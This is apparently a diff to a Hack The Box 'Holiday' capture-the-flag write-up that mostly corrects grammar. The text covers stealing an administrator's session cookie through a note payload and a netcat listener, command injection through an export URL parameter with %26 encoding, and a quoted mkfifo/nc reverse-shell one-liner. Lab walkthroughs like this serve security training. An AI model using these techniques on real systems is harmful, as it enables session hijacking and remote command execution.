madneal/htb/Holiday/README.md

 ```
 ![Ejv2od.png](https://s2.ax1x.com/2019/05/19/Ejv2od.png)

-Set kali listen to port 80: `nc -lvnp 80`.
+Set kali to listen to port 80: `nc -lvnp 80`.
 The code can be run in the chrome dev.
 Input the generated payload into the note, wait a minute the data will be sent to kali.

-The cookie of the administrator is obtained which is html encoded.
-Decode it with burp.
-And chage the cookie in the storage of firefox.
-Refesh the web page.
+The cookie of the administrator is obtained which is HTML encoded.
+Decode it with a burp.
+And change the cookie in the storage of firefox.
+Refresh the web page.
 Now you can hijack the administrator session cookie.
 Access to `http://10.10.10.25:8000/admin`.
-There seems nothing special except two buttons, including: Booking and Notes.
+There seems nothing special except two buttons, including Booking and Notes.

 ![EjjOxK.png](https://s2.ax1x.com/2019/05/19/EjjOxK.png)

-After some exploration, you will find that there are command injection in the two function url.
+After some exploration, you will find that there is command injection in the two function url.
 You can try to access `http://10.10.10.25:8000/admin/export?table=notes%26ls`.
-You can found the directories in the exported file.
+You can find the directories in the exported file.
 One thing should be noticed, as `&` has been prohibited.
 So you can pass this by `%26`.
-Hence, it seems that the table name exits RCE.
-But it's limited to charaters, numbers and `/`.
+Hence, it seems that the table name exists RCE.
+But it's limited to characters, numbers and `/`.
 So you should try to RCE by these.
-It's not possible to use command to obtain reverse shell by command.
+It's not possible to use the command to obtain reverse shell by command.
 For example, `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f`.
 As many characters is not allowed.

 ![Ev7Txg.png](https://s2.ax1x.com/2019/05/20/Ev7Txg.png)